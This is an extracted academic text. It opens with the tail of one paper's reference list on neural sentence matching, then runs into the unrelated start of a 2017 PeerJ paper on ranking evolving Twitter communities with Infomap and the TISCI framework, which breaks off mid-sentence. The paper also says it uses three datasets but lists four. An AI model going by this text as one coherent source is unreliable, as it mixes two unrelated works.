speech recognition using attention-based recurrent NN: First results. In Proceedings of Deep Learning and Repre- sentation Learning Workshop, NIPS. Jan Chorowski, Dzmitry Bahdanau, Dmitriy Serdyuk, Kyunghyun Cho, and Yoshua Bengio. 2015. Attention-based models for speech recognition. In Proceedings of NIPS, pages 577–585. Bill Dolan, Chris Quirk, and Chris Brockett. 2004. Un- supervised construction of large paraphrase corpora: Exploiting massively parallel news sources. In Pro- ceedings of COLING, pages 350–356. John Duchi, Elad Hazan, and Yoram Singer. 2011. Adaptive subgradient methods for online learning and stochastic optimization. JMLR, 12:2121–2159. Minwei Feng, Bing Xiang, Michael R. Glass, Lidan Wang, and Bowen Zhou. 2015. Applying deep learn- ing to answer selection: A study and an open task. In Proceedings of IEEE ASRU Workshop, pages 813– 820. Karol Gregor, Ivo Danihelka, Alex Graves, Danilo Jimenez Rezende, and Daan Wierstra. 2015. DRAW: A recurrent neural network for image generation. In Proceedings of ICML, pages 1462–1471. Hua He, Kevin Gimpel, and Jimmy J. Lin. 2015. Multi- perspective sentence similarity modeling with convo- lutional neural networks. In Proceedings of EMNLP, pages 1576–1586. Michael Heilman and Noah A. Smith. 2010. Tree edit models for recognizing textual entailments, para- phrases, and answers to questions. In Proceedings of NAACL-HLT, pages 1011–1019. Sepp Hochreiter and Jürgen Schmidhuber. 1997. Long short-term memory. Neural Computation, 9(8):1735– 1780. Seunghoon Hong, Junhyuk Oh, Honglak Lee, and Bo- hyung Han. 2016. Learning transferrable knowl- edge for semantic segmentation with deep convolu- tional neural network. In Proceedings of CVPR. Baotian Hu, Zhengdong Lu, Hang Li, and Qingcai Chen. 2014. Convolutional neural network architectures for matching natural language sentences. In Proceedings of NIPS, pages 2042–2050. Yangfeng Ji and Jacob Eisenstein. 2013. Discriminative improvements to distributional sentence similarity. In Proceedings of EMNLP, pages 891–896. Sergio Jimenez, George Dueñas, Julia Baquero, and Alexander Gelbukh. 2014. UNAL-NLP: Combining soft cardinality features for semantic textual similar- ity, relatedness and entailment. In Proceedings of Se- mEval, pages 732–742. Nal Kalchbrenner, Edward Grefenstette, and Phil Blun- som. 2014. A convolutional neural network for mod- elling sentences. In Proceedings of ACL, pages 655– 665. Yoon Kim. 2014. Convolutional neural networks for sen- tence classification. In Proceedings of EMNLP, pages 1746–1751. Alice Lai and Julia Hockenmaier. 2014. Illinois-LH: A denotational and distributional approach to semantics. In Proceedings of SemEval, pages 329–334. Yann LeCun, Léon Bottou, Yoshua Bengio, and Patrick Haffner. 1998. Gradient-based learning applied to document recognition. In Proceedings of the IEEE, pages 2278–2324. Jiwei Li, Minh-Thang Luong, and Dan Jurafsky. 2015. A hierarchical neural autoencoder for paragraphs and documents. In Proceedings of ACL, pages 1106–1115. Chin-Yew Lin. 2004. Rouge: A package for automatic evaluation of summaries. In Proceedings of the ACL Text Summarization Workshop. Thang Luong, Hieu Pham, and Christopher D. Manning. 2015. Effective approaches to attention-based neural machine translation. In Proceedings of EMNLP, pages 1412–1421. Nitin Madnani, Joel Tetreault, and Martin Chodorow. 2012. Re-examining machine translation metrics for paraphrase identification. In Proceedings of NAACL- HLT, pages 182–190. Marco Marelli, Luisa Bentivogli, Marco Baroni, Raf- faella Bernardi, Stefano Menini, and Roberto Zampar- elli. 2014a. Semeval-2014 task 1: Evaluation of com- positional distributional semantic models on full sen- tences through semantic relatedness and textual entail- ment. In Proceedings of SemEval, pages 1–8. Marco Marelli, Stefano Menini, Marco Baroni, Luisa Bentivogli, Raffaella Bernardi, and Roberto Zampar- elli. 2014b. A SICK cure for the evaluation of com- positional distributional semantic models. In Proceed- ings of LREC, pages 216–223. Tomas Mikolov, Ilya Sutskever, Kai Chen, Gregory S. Corrado, and Jeffrey Dean. 2013. Distributed rep- resentations of words and phrases and their composi- tionality. In Proceedings of NIPS, pages 3111–3119. George A. Miller. 1995. WordNet: A lexical database for english. Commun. ACM, 38(11):39–41. Volodymyr Mnih, Nicolas Heess, Alex Graves, and Ko- ray Kavukcuoglu. 2014. Recurrent models of visual attention. In Proceedings of NIPS, pages 2204–2212. Dan Moldovan, Christine Clark, Sanda Harabagiu, and Daniel Hodges. 2007. Cogex: A semantically and contextually enriched logic prover for question an- swering. Journal of Applied Logic, 5(1):49–69. Vasin Punyakanok, Dan Roth, and Wen-tau Yih. 2004. Mapping dependencies trees: An application to ques- tion answering. In Proceedings of AI&Math 2004 (Special session: Intelligent Text Processing). Tim Rocktäschel, Edward Grefenstette, Karl Moritz Her- mann, Tomáš Kočiskỳ, and Phil Blunsom. 2016. Rea- soning about entailment with neural attention. In Pro- ceedings of ICLR. Alexander M. Rush, Sumit Chopra, and Jason Weston. 2015. A neural attention model for abstractive sen- tence summarization. In Proceedings of EMNLP, pages 379–389. Dan Shen and Mirella Lapata. 2007. Using semantic roles to improve question answering. In Proceedings of EMNLP-CoNLL, pages 12–21. Richard Socher, Eric H. Huang, Jeffrey Pennington, An- drew Y. Ng, and Christopher D. Manning. 2011. Dy- namic pooling and unfolding recursive autoencoders for paraphrase detection. In Proceedings of NIPS, pages 801–809. Ming Tan, Bing Xiang, and Bowen Zhou. 2016. LSTM- based deep learning models for non-factoid answer se- lection. In Proceedings of ICLR Workshop. Shengxian Wan, Yanyan Lan, Jiafeng Guo, Jun Xu, Liang Pang, and Xueqi Cheng. 2016. A deep architecture for semantic matching with multiple positional sentence representations. In Proceedings of AAAI, pages 2835– 2841. Mengqiu Wang, Noah A. Smith, and Teruko Mitamura. 2007. What is the jeopardy model? A quasi- synchronous grammar for QA. In Proceedings of EMNLP-CoNLL, pages 22–32. Tianjun Xiao, Yichong Xu, Kuiyuan Yang, Jiaxing Zhang, Yuxin Peng, and Zheng Zhang. 2015. The application of two-level attention models in deep con- volutional neural network for fine-grained image clas- sification. In Proceedings of CVPR, pages 842–850. Kelvin Xu, Jimmy Ba, Ryan Kiros, Kyunghyun Cho, Aaron C. Courville, Ruslan Salakhutdinov, Richard S. Zemel, and Yoshua Bengio. 2015. Show, attend and tell: Neural image caption generation with visual at- tention. In Proceedings of ICML, pages 2048–2057. Yi Yang, Wen-tau Yih, and Christopher Meek. 2015. WikiQA: A challenge dataset for open-domain ques- tion answering. In Proceedings of EMNLP, pages 2013–2018. Xuchen Yao, Benjamin Van Durme, Chris Callison- Burch, and Peter Clark. 2013a. Semi-markov phrase- based monolingual alignment. In Proceedings of EMNLP, pages 590–600. Xuchen Yao, Benjamin Van Durme, and Peter Clark. 2013b. Automatic coupling of answer extraction and information retrieval. In Proceedings of ACL, pages 159–165. Wen-tau Yih, Ming-Wei Chang, Christopher Meek, and Andrzej Pastusiak. 2013. Question answering using enhanced lexical semantic models. In Proceedings of ACL, pages 1744–1753. Wenpeng Yin and Hinrich Schütze. 2015a. Convolu- tional neural network for paraphrase identification. In Proceedings of NAACL-HLT, pages 901–911. Wenpeng Yin and Hinrich Schütze. 2015b. Multi- GranCNN: An architecture for general matching of text chunks on multiple levels of granularity. In Pro- ceedings of ACL-IJCNLP, pages 63–73. Lei Yu, Karl Moritz Hermann, Phil Blunsom, and Stephen Pulman. 2014. Deep learning for answer sen- tence selection. In Proceedings of Deep Learning and Representation Learning Workshop, NIPS. Jiang Zhao, Tiantian Zhu, and Man Lan. 2014. ECNU: One stone two birds: Ensemble of heterogenous mea- sures for semantic relatedness and textual entailment. In Proceedings of SemEval, pages 271–277. Introduction Related Work BCNN: Basic Bi-CNN ABCNN: Attention-Based BCNN Experiments Answer Selection Paraphrase Identification Textual Entailment Summary work_eabupqevvbdzbepciteahrkls4 ---- Submitted 9 October 2016 Accepted 22 January 2017 Published 20 February 2017 Corresponding author Konstantinos Konstantinidis, konkonst@iti.gr Academic editor Radu Marculescu Additional Information and Declarations can be found on page 30 DOI 10.7717/peerj-cs.107 Copyright 2017 Konstantinidis et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Exploring Twitter communication dynamics with evolving community analysis Konstantinos Konstantinidis, Symeon Papadopoulos and Yiannis Kompatsiaris Information Technologies Institute, Centre for Research and Technology Hellas, Thessaloniki, Greece ABSTRACT Online Social Networks (OSNs) have been widely adopted as a means of news dissemination, event reporting, opinion expression and discussion. As a result, news and events are being constantly reported and discussed online through OSNs such as Twitter. However, the variety and scale of all the information renders manual analysis extremely cumbersome, and therefore creating a storyline for an event or news story is an effort-intensive task. The main challenge pertains to the magnitude of data to be analyzed. To this end, we propose a framework for ranking the resulting communities and their metadata on the basis of structural, contextual and evolutionary characteristics such as community centrality, textual entropy, persistence and stability. We apply the proposed framework on three Twitter datasets and demonstrate that the analysis that followed enables the extraction of new insights with respect to influential user accounts, topics of discussion and emerging trends. These insights could primarily assist the work of social and political analysis scientists and the work of journalists in their own story telling, but also highlight the limitations of existing analysis methods and pose new research questions. To our knowledge, this study is the first to investigate the ranking of dynamic communities. In addition, our findings suggest future work regarding the determination of the general context of the communities based on structure and evolutionary behavior alone. Subjects Data Mining and Machine Learning, Network Science and Online Social Networks, Social Computing Keywords Online social networks, Community evolution detection, Community ranking, Data mining INTRODUCTION OSNs have become influential means of disseminating news, reporting events and posting ideas as well as a medium for opinion formation (Topirceanu et al., 2016). Such networks combined with advanced statistical tools are often seen as the best sources of real-time information about global phenomena (Lazer et al., 2009; Aiello et al., 2013). Numerous studies of OSNs in relation to a variety of events have been conducted based on data from Twitter, a micro-blogging service that allows users to rapidly disseminate and receive information within the limit of 140 characters in a direct, grouped or global manner (Williams, Terras & Warwick, 2013; Nikolov et al., 2015). Twitter is currently one How to cite this article Konstantinidis et al. (2017), Exploring Twitter communication dynamics with evolving community analysis. PeerJ Comput. Sci. 3:e107; DOI 10.7717/peerj-cs.107 https://peerj.com mailto:konkonst@iti.gr https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.107 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://dx.doi.org/10.7717/peerj-cs.107 1According to company statistics: http://about.twitter.com/company (last accessed on August 2016). of the largest OSN platforms, with 313 million monthly active users1 and as such the vast amounts of information shared through it cannot be accessed or made use of unless this information is somehow organized. Thus, appropriate means of filtering and sorting are necessary to support efficient browsing, influential user discovery, and searching and gaining an overall view of the fluctuating nature of online discussions. Existing information browsing facilities, such as simple text queries typically result in immense amounts of posts rendering the inquirer clueless with respect to the online topics of discussion. Since online social networks exhibit the property of community structure, one of the more implicit manners of grouping information and thus facilitating the browsing process is by detecting the communities formed within the network. Research on community detection on static networks can be found in the Lancichinetti & Fortunato (2009) survey, as well as in the works of Granell et al. (2015), Newman (2006), Leskovec, Lang & Mahoney (2010) and Papadopoulos et al. (2012). Real-world OSNs, however, are definitely not static. The networks formed in services such as Twitter undergo major and rapid changes over time, which places them in the field of dynamic networks (Asur, Parthasarathy & Ucar, 2007; Giatsoglou & Vakali, 2013; Palla, Barabasi & Vicsek, 2007; Takaffoli et al., 2011; Tantipathananandh, Berger-Wolf & Kempe, 2007; Roy Chowdhury & Sukumar, 2014; Gauvin, Panisson & Cattuto, 2014; Greene, Doyle & Cunningham, 2010; Aktunc et al., 2015; Albano, Guillaume & Le Grand, 2014). These changes are manifested as users join in or leave one or more communities, by friends mentioning each other to attract attention or by new users referencing a total stranger. These trivial interactions seem to have a minor effect on the local structure of a social network. However, the network dynamics could lead to a non-trivial transformation of the entire community structure over time, and consequently create a need for reidentification. Particularly in OSNs, the immensely fast and unpredictably fluctuating topological structure of the resulting dynamic networks renders them an extremely complicated and challenging problem. Additionally, important questions related to the origin and spread of online messages posted within these networks, as well as the dynamics of interactions among online users and their corresponding communities remain unanswered. To this end, we present a framework for analyzing and ranking the community structure, interaction and evolution in graphs. We also define a set of different evolution scenarios, which our method can successfully identify. A community here is essentially a subgraph which represents a set of interacting users as they tweet and mention one another. The edges of the subgraph represent the mentions made between users. A dynamic community is formed by a temporal array of the aforementioned communities with the condition that they share common users (Cazabet & Amblard, 2014; Nguyen et al., 2014). Community evolution detection has been previously used to study the temporal structure of a network (Gauvin, Panisson & Cattuto, 2014; Greene, Doyle & Cunningham, 2010; Palla, Barabasi & Vicsek, 2007; Takaffoli et al., 2011). However, even by establishing only the communities that sustain interest over time, the amount of communities and thus metadata that a user has to scan through is immense. In our previous work (Konstantinidis, Papadopoulos & Kompatsiaris, 2013), we proposed an adaptive approach to discover communities at points in time of increasing interest, but also a size-based varying threshold Konstantinidis et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.107 2/34 https://about.twitter.com/company https://peerj.com http://dx.doi.org/10.7717/peerj-cs.107 for use in community evolution detection. Both were introduced in an attempt to discard trivial information and to implicitly reduce the available content. Although the amount of information was somewhat reduced, the extraction of information still remained a tedious task. Hence, to further facilitate the browsing of information that a user has to scan through in order to discover items of interest, we present a sorted version of the data similarly to a search engine. The sorting of the data is performed via the ranking of dynamic communities on the basis of seven distinct features which represent the notions of Time, Importance, Structure, Context and Integrity (TISCI). Nonetheless, the sorting of textual information and thus some kind of summarization is only a side-effect of the dynamic community ranking. The main impact lies in the identification and monitoring of persistent, consistent and diverse groups of people who are bound by a specific matter of discussion. The closest work to dynamic community ranking was recently presented by Lu & Brelsford (2014) in a behavioral analysis case study and as such it is used here as a baseline for comparison purposes. However, it should be mentioned that the ranking was not the primary aim of their research and that the communities were separately sorted by size thus missing the notions of importance, temporal stability and content diversity which are employed in the proposed framework. To the best of our knowledge, this is the first time that structural, temporal, importance and contextual features are fused in a dynamic community ranking algorithm for a modern online social network application. Although the overall problem is covered by the more general field of evolving network mining, it actually breaks down in many smaller issues that need to be faced. Table 1 presents the decomposition of the problem into these issues, together with popular available methods which can be used to overcome them, along with the techniques employed by Lu & Brelsford (2014) and the ones proposed by the TISCI framework which is presented here. In this work, we consider the user activity in the form of mentioning posts, the communities to which the users belong, and most importantly, the evolutionary and significance characteristics of these communities and use them in the ranking process. The proposed analysis is carried out in three steps. In the first step, the Twitter API is used to extract mentioning messages that contain interactions between users and a sequence of time periods is determined based on the level of activity. Then, for each of these periods, graph snapshots are created based on user interactions and the communities of highly interacting users are extracted using the Infomap community detection method (Rosvall & Bergstrom, 2008). During the second step, the community evolution detection process inspects whether any communities have persisted in time over a long enough period (eight snapshots). In the last and featured step, the evolution is studied in order to rank the communities and their metadata (i.e., tweeted text, hashtags, URLs, etc.) with respect to the communities’ persistence, stability, centrality, size, diversity and integrity characteristics, thus creating dynamic community containers which provide structured access to information. The temporal (evolutional) and contextual features are also the main reason why a static community detection method was employed instead of a dynamic method which Konstantinidis et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.107 3/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.107 Table 1 Deconstruction of the evolving network mining problem. Subproblem Available methods Lu & Brelsford (2014) Proposed framework Event-based Time-based Granularity selection Activity-based Event-based Time-based Louvain Infomap Community detection Modularity Optimization Infomap Infomap Jaccard Sorensen Euclidean Set similarity Cosine Jaccard Jaccard Reciprocal Rank Multi-criteria analysis Feature fusion Condorcet None Reciprocal Rank Fusion Size Centrality Information ranking TISCI Size TISCI would aggregate the information such as the one proposed by Nguyen et al. (2014). In order to evaluate the proposed framework it is applied on three datasets extracted from Twitter to demonstrate that it can serve as a means of discovering newsworthy pieces of information and real-world incidents around topics of interest. The first dataset was collected by monitoring discussions around tweets containing vocabulary on the 2014 season of BBC’s Sherlock, the second and third contain discussions on Greece’s 2015 January and September elections, and the last one containing vocabulary regarding the 2012 presidential elections in the US (Aiello et al., 2013). Three community detection methods are also employed to demonstrate that Infomap is the preferable scheme. Due to the lack of ground truth datasets for the evaluation of the proposed framework, we devised and are proposing a novel, context-based evaluation scheme which could serve as a basis for future work. It is our belief that by studying the contents of discussions being made in groups and the evolution of these groups we can produce a better understanding of the users’ and communities’ behavior and can give deeper insights into unfolding large-scale events. Consequently, our main contributions can be summed up in the following: • a novel ranking framework for dynamic communities based on temporal and contextual features; • a context-based evaluation scheme aimed to overcome the absence of ground truth datasets for the community discovery analysis; • an empirical study on three Twitter datasets demonstrating the merits of the proposed framework. An additional asset of the TISCI ranking method, which is the main contribution of this paper, is that it was created to work with any kind of community evolution detection Konstantinidis et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.107 4/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.107 method that retains discrete temporal information and that it is independent of the choice of the community detection algorithm applied to the individual timeslots. RELATED WORK Mining OSN interactions is a topic that has attracted considerable interest in recent years. Interaction analysis provides insights and solutions to a wide range of problems such as cyber-attacks (Wei et al., 2015), recommendation systems (Kim & Shim, 2014; Gupta et al., 2013), summarization (Schinas et al., 2015; Lin, Sundaram & Kelliher, 2008) and information diffusion (Yang, McAuley & Leskovec, 2013). One of the most recent attempts comes from McKelvey et al. (2012) who presented the Truthy system for collecting and analyzing political discourse on Twitter, providing real- time, interactive visualizations of information diffusion processes. They created interfaces containing several key analytical components. These elements include an interactive layout of the communication network shared among the most retweeted users of a meme and detailed user-level metrics on activity volume, sentiment, inferred ideology, language, and communication channel choices. TwitInfo is another system that provides network analysis and visualizations of Twitter data. Its content is collected by automatically identifying ‘‘bursts’’ of tweets (Marcus et al., 2011). After calculating the top tweeted URLs in each burst, it plots each tweet on a map, colored according to sentiment. TwitInfo focuses on specific memes, identified by the researchers, and is thus limited in cases when arbitrary topics are of interest. Both of the aforementioned frameworks present an abundance of statistics for individual users but contrary to our method, they do not take into account the communities created by these users or the evolution of these communities. Greene, Doyle & Cunningham (2010) presented a method in which they use regular fortnight time intervals to sample a mobile phone network in a two month period and extract the communities created between the users of the network. Although the network selected is quite large and the method is also very fast; the system was created in order to be applied on a mobile phone network which renders it quite different to the networks studied in this paper. The collected data lack the topic of discussion and the content of the messages between users, so there is no way to discover the reason for which a community was transformed or the effect that the transformation really had on the topic of that community. Moreover, although the features of persistence and stability are mentioned in the paper, no effort was made in ranking the communities. Nonetheless, due to its speed and scalability advantages, in this paper we decided to employ and extend their method by introducing a couple of optimization tweaks which render it suitable for large scale applications such as the analysis of an OSN. Finding the optimal match between communities in different timeslots was proposed in Tantipathananandh, Berger-Wolf & Kempe (2007), where the dynamic community detection approach was framed as a graph-coloring problem. Since the problem is NP- hard, the authors employed a heuristic technique that involved greedily matching pairs of node-sets in between timeslots, in descending order of similarity. Although this technique Konstantinidis et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.107 5/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.107 has shown to perform well on a number of small well-known social network datasets such as the Southern Women dataset, as the authors state in the paper, it does not support the identification of dynamic events such as community merging and splitting thus losing significant information which is of utmost importance in the proposed ranking framework which heavily relies on the content and context of the tweets. Takaffoli et al. (2011) considered the context of the Enron (250 email addresses in the last year from the original dataset) and DBLP (three conferences from 2004 to 2009) datasets for evaluation purposes, but similar to Greene, Doyle & Cunningham (2010) they also studied the context independently of community evolution. They focused on the changes in community evolution and the aver- age topic continuation with respect to changes in the similarity threshold. The analyzed data presented valuable information as to how to select the similarity threshold but no insight as to important communities, their users or specific topics. Another dynamic community detection method used to extract trends was introduced by Cazabet et al. (2012). They created an evolving network of terms, which is an abstraction of the complete network, and then applied a dynamic community detection algorithm on this evolving network in order to discover emerging trends. Although the algorithm is very effective for locating trends, it does not consider the interactions made between various users or the evolution of the communities. The work by Lin, Sundaram & Kelliher (2008) bears some similarities in terms of motivation as they also want to gain insights into large-scale involving networks. They do this via extracting themes (concepts) and associating them with users and activities (e.g., commenting) and then try to study their evolution. However, they provide no way of ranking the extracted themes, which is the focus of our work. One of the main problems in detecting influential communities in temporal networks is that most of the time they are populated with a large amount of outliers. While tackling the problem of dynamic network summarization, Qu et al. (2014) capture only the few most interesting nodes or edges over time, and they address the summarization problem by finding interestingness-driven diffusion processes. Ferlez et al. (2008) proposed TimeFall which performs time segmentation using cut- points, community detection and community matching across segments. Despite the fact that they do not rank the communities, the proposed scheme could be employed to extract and detect evolving communities which would in turn be ranked by the TISCI framework. In Mucha et al. (2010), the concept of multiplex networks is introduced via the extension of the popular modularity function and by adapting its implicit null model to fit a layered network. Here, each layer is represented with a slice. Each slice has an adjacency matrix describing connections between nodes which belong to the previously considered slice. Essentially, they perform community detection on a network of networks. Although these frameworks technically require a network to be node-aligned (all nodes appear in all layers/timeslots), they have been used explicitly to consider relatively small networks in which that is not the case by using zero-padding. However, this creates a huge overhead in OSNs since the majority of users does not appear in every timeslot. In addition, Mucha et Konstantinidis et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.107 6/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.107 al. (2010) do not provide any method for the ranking of the extracted communities, which is the focus of this paper. A method for ranking communities, specifically quasi-cliques, was proposed by Xiao et al. (2007) in which they rank the respective cliques in respect to their betweeness centrality. However, they also do not take temporal measures into consideration and apply their method on a call graph from a telecom carrier and a collaboration network of co-authors thus excluding the context of the messages. The most recent work regarding the extraction of information using evolving communities was presented in Lu & Brelsford (2014) which studied the behavior of people discussing the 2011 Japanese earthquake and tsunami. Although they did rank the static communities by size, the evolution regarded only the before and after periods, so no actual dynamic community ranking was performed. OSN ANALYSIS FRAMEWORK OSN applications comprise a large number of users that can be associated to each other through numerous types of interaction. Graphs provide an elegant representation of data, containing the users as their vertices and their interactions (e.g., mentions, citations) as edges. Edges can be of different types, such as simple, weighted, directed and multiway (i.e., connecting more than two entities) depending on the network creation process. Notation In this paper, we employ the standard graph notation G=(V,E,w), where G stands for the whole network; V stands for the set of all vertices and E for the set of all edges. In particular, we use lowercase letters (x) to represent scalars, bold lowercase letters (x) to represent vectors, and uppercase letters (X) to represent matrices. A subscript n on a variable (Xn) indicates the value of that variable at discrete time n. We use a snapshot graph to model interactions at a discrete time interval n. In Gn, each node vi ∈Vn represents a user and each edge eij ∈En is associated with a directed weight wij corresponding to the frequency of mentions between vi and vj. The interaction history is represented by a sequence of graph snapshots 〈G1,G2,...,Gn,...〉. A community Ci,n which belongs to the set of communities C = { C1,1,...,Ci,n,... } is defined here as a subgraph comprising a subset Vcomm ⊆V of nodes such that connections between the nodes are denser than connections with the rest of the network. A dynamic community Ti,n which belongs to the set T = { T1,1,...,Ti,n,...,Ti,N−1 } of time-evolving communities, is defined as a series of subgraphs that consist of subsets of all the nodes in V and the set of interactions among the nodes in these subsets that occur within a set of N timeslots. Framework description This section describes the proposed framework in three parts: community detection, community evolution detection and ranking. Figure 1 illustrates all the steps of the proposed framework. Konstantinidis et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.107 7/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.107 Community Size Pre-processsing (Information Extraction) Temporal Adjacency Matrices Formation Temporal Data Discretization Community Evolution Detection Community Detection (Infomap) Ranking & Info Fusion Evolution Detection Process Twitter Data Mentions, hashtags, urls and text in time Persistence x Stability Textual Diversity Centrality Theseus Coef. Popular hashtags,URLs, textual content Most influential users and communities Size DyCCos (JSON) Outcome Figure 1 Block diagram of the proposed framework. Interaction data discretization and graph creation The tweet timestamp and a corresponding sampling frequency are used to group the interactions into timeslots. The selection of time granularity (inverse sampling frequency) for each network is based on the change in activity. The aim is to create clear sequential graph snapshots of the network as presented in Fig. 2. The sampling time should be meaningful on its own (hours, days) but individually for each case as well. For example, for the Greek election and Sherlock series datasets, a 24-hour period was selected to detect day-by-day changes to the flourishing discussions during the anticipation period of the corresponding events (Election Day, episode broadcasting) and the post-event reactions. The 24-hour period in conjunction with the deep search performed during the evolution Konstantinidis et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.107 8/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.107 (a) (b) (c) (d) Figure 2 Referencing frequency activity for the four networks. (A) January 2015 Greek elections, (B) September 2015 Greek elections, (C) 2012 US elections and (D) 2014 BBC’s Sherlock series. detection process, allows the framework to discover persistent communities over a one week time-frame. Every node in the resulting graphs represents a Twitter user who communicated tweets in the datasets by mentioning or being mentioned. A mention, and thus a directed edge between two users is formed when one of the two creates a reference to the other in his/her posted content via use of the @ symbol. The number of mentions between them forms the edge weight. Community detection Given a social network, a community can be defined as a subgraph comprising a set of users that are typically associated through a common element of interest. This element can be as varied as a topic, a real-world person, a place, an event, an activity or a cause (Papadopoulos et al., 2012). We expect to discover such communities by analyzing mention networks on Twitter. There is considerable work on the topic and a host of different community detection approaches appear in literature (Fortunato, 2010; Papadopoulos et al., 2012). Due to the nature of Twitter mention networks, notably their sparsity and size, in this paper we apply the Infomap method (Rosvall & Bergstrom, 2008) to detect the underlying community structures. Infomap optimizes the map equation (Rosvall, Axelsson & Bergstrom, 2009), which exploits the information-theoretic duality between the problem of compressing data, and the problem of detecting and extracting significant patterns or structures within those data. The Infomap method is essentially built based Konstantinidis et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.107 9/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.107 Table 2 Number of detected dynamic communities with and without the timeslot delay. Louvain Newman Infomap Delay 1,696 1,021 4,422 US election No delay 985 579 2,646 Delay 1,369 1,175 3,374 Sherlock No delay 638 544 1,684 Delay 322 266 1,120Greek election January No delay 235 191 763 Delay 219 198 639Greek election September No delay 144 127 403 on optimizing the minimum description length of the random walk on the network. The Infomap scheme was selected for three reasons; first, according to Lancichinetti & Fortunato (2009) and Granell et al. (2015) and our own preliminary results, Infomap is very fast and outperforms even the most popular of community detection methods such as Louvain (Blondel et al., 2008) and Newman’s modularity optimization technique (Newman, 2006). Further, the low computational complexity of O(m) (m signifies the number of edges in a graph) encourages its use on graphs of large real networks. Last, Lu & Brelsford (2014) used it in their experimental setup and as such it is suitable for comparative purposes. It should be noted that the focus of the framework is to rank the dynamic communities independently from the method used for their detection and not to perform an exhaustive comparison of algorithms able to process dynamic networks. Nonetheless, Fig. 3 as well as Table 2 provide support in favor of Infomap in comparison to the Louvain and Newman methods, as Infomap detects the most communities and significantly more from the middle region. Figures 3, 4C and 4D show the performance of the Louvain and the modularity optimization technique. They both seem to detect either very large or relatively small communities, which are out of the middle section. The middle section poses the most interest for this study as it contains reasonably populated groups for the purposes of a discussion. In the future, it may be interesting to thoroughly investigate the sensitivity of results with respect to the employed community detection method. Community evolution detection The problem of finding communities in static graphs has been addressed by researchers for several years (Blondel et al., 2008; Newman, 2006; Giatsoglou, Chatzakou & Vakali, 2013). However, the highly dynamic nature of OSNs has moved the spotlight to the subject of dynamic graph analysis (Nguyen et al., 2014; Asur, Parthasarathy & Ucar, 2007; Giatsoglou & Vakali, 2013; Palla, Barabasi & Vicsek, 2007; Takaffoli et al., 2011; Roy Chowdhury & Sukumar, 2014). In this paper, we represent a dynamic network as a sequence of graph snapshots 〈G1,G2,...,Gn,...〉. The objective is to detect and extract dynamic communities T by identifying the communities C that are present in the network across a set of N timeslots and create a container which includes a variety of metadata such as popular hashtags and URLs, influential users and the posted text. A dynamic community is represented by the Konstantinidis et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.107 10/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.107 Figure 3 Community Jaccard distance (similarity) over community size. Results using the Infomap (A, B), Newman (C, D) and Louvain (E, F) community detection algorithms for the 2014 BBC’s Sherlock se- ries (A, C, E) and the 2012 US elections (B, D, F). The red dots signify the undetected communities which were missed due to the absence of the time-delay search, whereas the blue-ones signify commonly detected communities. Konstantinidis et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.107 11/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.107 (a) (b) (c) (d) Figure 4 Population of matching nodes per timeslot for the Sherlock dataset. (A) Infomap with a threshold of 0.3 (TISCI), (B) Infomap with a threshold of 0.5 (Lu & Brelsford, 2014), (C) Louvain with a threshold of 0.3 (Greene, Doyle & Cunningham, 2010) and (D) Newman with a threshold of 0.3. Every line is essentially a dynamic community. timeline of the communities of users that it comprises. The difference between sets C and T is that the former contains every static community in every available timeslot, whereas the latter contains sequences of communities that evolve through time. In both Ci,n and Ti,n i is a counter of communities and dynamic communities respectively, while particularly in Ti,n n represents the timeslot of birth of the dynamic community. Figure 5 presents an example of the most frequent conditions that communities might experience: birth, death, irregular occurrences, merging and splitting, as well as growth and decay that register when a significant percentage of the community population is affected. In the example of Fig. 5, the behavior of six potential dynamic communities is studied over a period of three timeslots (n−1,n,n+1). Dynamic community T1,n−x originated from a previous timeslot n−x which then split up into a fork formation in timeslot n. In T1,n−x, x is an integer valued variable representing the timeslot delay which can acquire a maximum value of D (1≤x ≤D≤N). The split indicates that for some reason the members of C1,n−1 broke up into two separate smaller groups in timeslot n, which also explains the change in size. In our case it could be that a large group of users engaged in conversation during n−1 but split up and are not cross mentioning each other in n and n+1. Moreover, although the Konstantinidis et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.107 12/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.107 second group (C2,n) instigated a new dynamic community T7,n, it continued its decaying activity for one more timeslot and then dispersed (community death). Nonetheless, both are obviously important to the evolution of the community and the separation poses a great interest from a content point of view as to the ongoing user discussion and as to why they actually split up. Both can be answered by using the metadata stored in the container corresponding to the dynamic community. A dual example is that of T2,n−1 and T3,n−x in which two communities started up as weak and small but evolved through a merger into one very strong, large community that continues on to n+2. In this case it could be that two different groups of people witnessed the same event and began conversing on it separately. As time went by, connections were made between the two groups and in the n timeslot they finally merged into one. Actually, the community continued to grow as shown on the n+1 timeslot. T4,n−1 and Tn/a were both created (community birth) in n−1 and both disappeared in n differentiating in that T4,n−1 reappears in n+1 (irregular occurrence) while Tn/a does not and thus a dynamic community is not registered. This is the main reason why a timeslot delay is introduced in the system as will be described later; a search strictly between communities of consecutive timeslots would result in missing such re-occurrences. To study the various lifecycle stages of a community, the main challenge pertains to the computational process used to identify and follow the evolution of any given community. On the one hand, it should be able to effectively map every community to its corresponding timeline, and on 